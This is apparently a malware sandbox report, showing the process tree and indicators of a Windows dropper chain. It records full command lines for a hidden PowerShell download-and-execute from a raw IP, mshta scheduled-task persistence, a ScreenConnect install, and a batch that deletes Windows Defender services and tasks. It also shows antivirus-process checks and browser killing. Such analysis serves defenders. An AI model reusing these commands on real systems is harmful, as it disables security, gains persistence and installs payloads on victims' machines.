pid Process 5052 df504a29ad522d6eabe6258886d296bc.exe 2184 msiexec.exe 4664 Exam.com 4664 Exam.com 4664 Exam.com 1536 1cf4d08f1a.exe 1536 1cf4d08f1a.exe 1536 1cf4d08f1a.exe 2184 msiexec.exe 2292 Exam.com 2292 Exam.com 2292 Exam.com 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 5004 66db0435e2.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 4664 Exam.com 4664 Exam.com 4664 Exam.com 1536 1cf4d08f1a.exe 1536 1cf4d08f1a.exe 1536 1cf4d08f1a.exe 2292 Exam.com 2292 Exam.com 2292 Exam.com 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 5004 66db0435e2.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 1740 firefox.exe 5004 66db0435e2.exe 5004 66db0435e2.exe 5004 66db0435e2.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1740 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5052 wrote to memory of 3256 5052 df504a29ad522d6eabe6258886d296bc.exe 89 PID 5052 wrote to memory of 3256 5052 df504a29ad522d6eabe6258886d296bc.exe 89 PID 5052 wrote to memory of 3256 5052 df504a29ad522d6eabe6258886d296bc.exe 89 PID 3256 wrote to memory of 2200 3256 rapes.exe 95 PID 3256 wrote to memory of 2200 3256 rapes.exe 95 PID 3256 wrote to memory of 2200 3256 rapes.exe 95 PID 2200 wrote to memory of 812 2200 TbV75ZR.exe 96 PID 2200 wrote to memory of 812 2200 TbV75ZR.exe 96 PID 2200 wrote to memory of 812 2200 TbV75ZR.exe 96 PID 3256 wrote to memory of 4132 3256 rapes.exe 99 PID 3256 wrote to memory of 4132 3256 rapes.exe 99 PID 3256 wrote to memory of 4132 3256 rapes.exe 99 PID 812 wrote to memory of 3564 812 CMD.exe 101 PID 812 wrote to memory of 3564 812 CMD.exe 101 PID 812 wrote to memory of 3564 812 CMD.exe 101 PID 812 wrote to memory of 2764 812 CMD.exe 102 PID 812 wrote to memory of 2764 812 CMD.exe 102 PID 812 wrote to memory of 2764 812 CMD.exe 102 PID 3256 wrote to memory of 2204 3256 rapes.exe 103 PID 3256 wrote to memory of 2204 3256 rapes.exe 103 PID 3256 wrote to memory of 2204 3256 rapes.exe 103 PID 812 wrote to memory of 4380 812 CMD.exe 104 PID 812 wrote to memory of 4380 812 CMD.exe 104 PID 812 wrote to memory of 4380 812 CMD.exe 104 PID 812 wrote to memory of 4168 812 CMD.exe 105 PID 812 wrote to memory of 4168 812 CMD.exe 105 PID 812 wrote to memory of 4168 812 CMD.exe 105 PID 2204 wrote to memory of 2184 2204 tool.exe 106 PID 2204 wrote to memory of 2184 2204 tool.exe 106 PID 2204 wrote to memory of 2184 2204 tool.exe 106 PID 812 wrote to memory of 4552 812 CMD.exe 107 PID 812 wrote to memory of 4552 812 CMD.exe 107 PID 812 wrote to memory of 4552 812 CMD.exe 107 PID 812 wrote to memory of 1040 812 CMD.exe 108 PID 812 wrote to memory of 1040 812 CMD.exe 108 PID 812 wrote to memory of 1040 812 CMD.exe 108 PID 4712 wrote to memory of 4972 4712 msiexec.exe 111 PID 4712 wrote to memory of 4972 4712 msiexec.exe 111 PID 4712 wrote to memory of 4972 4712 msiexec.exe 111 PID 4972 wrote to memory of 3880 4972 MsiExec.exe 112 PID 4972 wrote to memory of 3880 4972 MsiExec.exe 112 PID 4972 wrote to memory of 3880 4972 MsiExec.exe 112 PID 812 wrote to memory of 620 812 CMD.exe 113 PID 812 wrote to memory of 620 812 CMD.exe 113 PID 812 wrote to memory of 620 812 CMD.exe 113 PID 812 wrote to memory of 4508 812 CMD.exe 115 PID 812 wrote to memory of 4508 812 CMD.exe 115 PID 812 wrote to memory of 4508 812 CMD.exe 115 PID 812 wrote to memory of 412 812 CMD.exe 117 PID 812 wrote to memory of 412 812 CMD.exe 117 PID 812 wrote to memory of 412 812 CMD.exe 117 PID 812 wrote to memory of 4664 812 CMD.exe 118 PID 812 wrote to memory of 4664 812 CMD.exe 118 PID 812 wrote to memory of 4664 812 CMD.exe 118 PID 812 wrote to memory of 928 812 CMD.exe 119 PID 812 wrote to memory of 928 812 CMD.exe 119 PID 812 wrote to memory of 928 812 CMD.exe 119 PID 3256 wrote to memory of 1652 3256 rapes.exe 120 PID 3256 wrote to memory of 1652 3256 rapes.exe 120 PID 3256 wrote to memory of 1652 3256 rapes.exe 120 PID 1652 wrote to memory of 3348 1652 WLbfHbp.exe 121 PID 1652 wrote to memory of 3348 1652 WLbfHbp.exe 121 PID 1652 wrote to memory of 3348 1652 WLbfHbp.exe 121 PID 3256 wrote to memory of 1784 3256 rapes.exe 124 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2720
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6388
-
-
C:\Users\Admin\AppData\Local\Temp\df504a29ad522d6eabe6258886d296bc.exe"C:\Users\Admin\AppData\Local\Temp\df504a29ad522d6eabe6258886d296bc.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10338870101\TbV75ZR.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4380
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵PID:4168
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵
- System Location Discovery: System Language Discovery
PID:4552
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵
- System Location Discovery: System Language Discovery
PID:1040
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵
- System Location Discovery: System Language Discovery
PID:620
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵
- System Location Discovery: System Language Discovery
PID:4508
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵PID:412
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4664 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4664 -s 9046⤵
- Program crash
PID:3244
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:928
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340260101\8809b51fa3.exe"C:\Users\Admin\AppData\Local\Temp\10340260101\8809b51fa3.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4132
-
-
C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"C:\Users\Admin\AppData\Local\Temp\10340340101\tool.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2184
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10340560101\WLbfHbp.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1652 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat4⤵
- System Location Discovery: System Language Discovery
PID:3348 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:4780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"5⤵
- System Location Discovery: System Language Discovery
PID:4008
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:2224
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"5⤵
- System Location Discovery: System Language Discovery
PID:3984
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679785⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss5⤵
- System Location Discovery: System Language Discovery
PID:3456
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed5⤵
- System Location Discovery: System Language Discovery
PID:4728
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com5⤵
- System Location Discovery: System Language Discovery
PID:3612
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j5⤵
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2292 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 9326⤵
- Program crash
PID:6444
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵
- System Location Discovery: System Language Discovery
PID:3432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1784
-
-
C:\Users\Admin\AppData\Local\Temp\10341150101\1cf4d08f1a.exe"C:\Users\Admin\AppData\Local\Temp\10341150101\1cf4d08f1a.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1536 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 6bf09mapwKj /tr "mshta C:\Users\Admin\AppData\Local\Temp\SROtzTNqO.hta" /sc minute /mo 25 /ru "Admin" /f4⤵PID:4808
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 6bf09mapwKj /tr "mshta C:\Users\Admin\AppData\Local\Temp\SROtzTNqO.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:4308
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\SROtzTNqO.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4084 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2088 -
C:\Users\Admin\AppData\Local\TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE"C:\Users\Admin\AppData\Local\TempVBA0JPEY88QDVDR7NTDRHN0ZZ672XGNN.EXE"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2868
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10341160121\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
PID:1204 -
C:\Windows\SysWOW64\timeout.exetimeout /t 24⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4316
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"4⤵PID:3828
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:3612 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"4⤵
- System Location Discovery: System Language Discovery
PID:968 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4512
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "Ffazema6wm8" /tr "mshta \"C:\Temp\fKnpNDuBV.hta\"" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4724
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\fKnpNDuBV.hta"4⤵
- Checks computer location settings
PID:4904 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2244 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2188
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3556 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\410B.tmp\410C.tmp\410D.bat C:\Users\Admin\AppData\Local\Temp\11.exe"5⤵PID:1780
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go6⤵
- Checks computer location settings
- Executes dropped EXE
PID:2856 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4570.tmp\4571.tmp\4572.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"7⤵
- Drops file in Program Files directory
PID:3840 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:3740
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:3176
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:3828
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:3244
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2684
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3600
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:952
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:1112
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:2380
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:4812
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:2032
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:4156
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:1676
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:4868
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:620
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:4728
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:776
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:4008
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵
- Modifies security service
PID:740
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:3600
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:4888
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:4356
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:336
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:3300
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:4356
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:1676
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:3300
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:3140
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:2392
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:3456
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:2088
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:3300
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:3140
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:4724
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:1520
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:1760
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:740
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:2224
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:2188
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:1780
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:2380
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:3456
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:2032
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:968
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:924
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:4512
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:1204
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:2684
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:1112
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:4144
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:5004
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:3800
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:2188
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:1780
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:2380
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341520101\e7dd32382e.exe"C:\Users\Admin\AppData\Local\Temp\10341520101\e7dd32382e.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1584
-
-
C:\Users\Admin\AppData\Local\Temp\10341530101\dc3db1808a.exe"C:\Users\Admin\AppData\Local\Temp\10341530101\dc3db1808a.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:548
-
-
C:\Users\Admin\AppData\Local\Temp\10341540101\66db0435e2.exe"C:\Users\Admin\AppData\Local\Temp\10341540101\66db0435e2.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5004 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:736
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:3332
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:2632 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3800
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:700 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:924
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4684
-
-
